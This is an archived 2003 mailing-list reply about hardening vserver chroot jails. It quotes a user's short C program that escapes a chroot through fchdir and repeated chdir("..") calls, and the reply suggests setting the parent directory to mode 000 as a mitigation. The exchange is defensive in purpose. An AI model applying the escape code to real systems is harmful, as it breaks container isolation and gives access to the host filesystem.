From: John P. Eisenmenger (jpe_at_eisenmenger.org)
Date: Tue 04 Mar 2003 - 16:17:51 GMT
Do you have the parent directory of the vserver root set with mode 000?
For example:
root_at_john jpe # ls -ld /vservers /vservers/gentoo /vservers/x
d--------- 5 root root 4096 Feb 24 15:45 /vservers
drwxr-xr-x 17 root root 4096 Feb 12 10:35 /vservers/gentoo
drwxr-xr-x 16 root root 4096 Feb 12 15:42 /vservers/x
Supposedly setting the permissions of the parent directory to 000 blocks
this method of escape. In fact I believe the vserver command will
complain loudly if this is not the case.
-John
On Tue, 4 Mar 2003, Mihai RUSU wrote:
> Hi
>
> I am trying to secure a chroot enviroment for vserver. Problem is that
> standard chroot can be escaped very easy with a small program (if the user
> has uid 0 access, if he can do chroot()).
>
> Here is the program I use to test chroot() protection:
>
> #include <stdio.h>
> #include <fcntl.h>
>
> int main()
> {
> int fd;
>
> mkdir("bla", 0755);
> fd = open(".",O_RDONLY);
> chroot("bla");
> fchdir(fd);
> chdir("../../../../../../../../../..");
> mkdir("escaped");
> }
>
> Doing standard chroot in a chroot enviroment then running this little prog
> creates a "escaped" directory in the real root of the system :(
>
> Problem is that I tried capchroot --nochroot and it does the same. Also I
> have tried chcontext --secure . I was looking for help from reducecap but
> it seams it doesnt remove the capability :
>
> # reducecap --secure --SYS_CHROOT /bin/bash
> Executing
> # reducecap --show
> ...
> CAP_SYS_CHROOT X X
>
> How can make sure nobody (not even uid 0) from a vserver cannot escape its
> chroot jail ?
>
> Thanks
>
> ----------------------------
> Mihai RUSU
>
> Disclaimer: Any views or opinions presented within this e-mail are solely
> those of the author and do not necessarily represent those of any company,
> unless otherwise specifically stated.
>
-- John P. Eisenmenger jpe_at_eisenmenger.org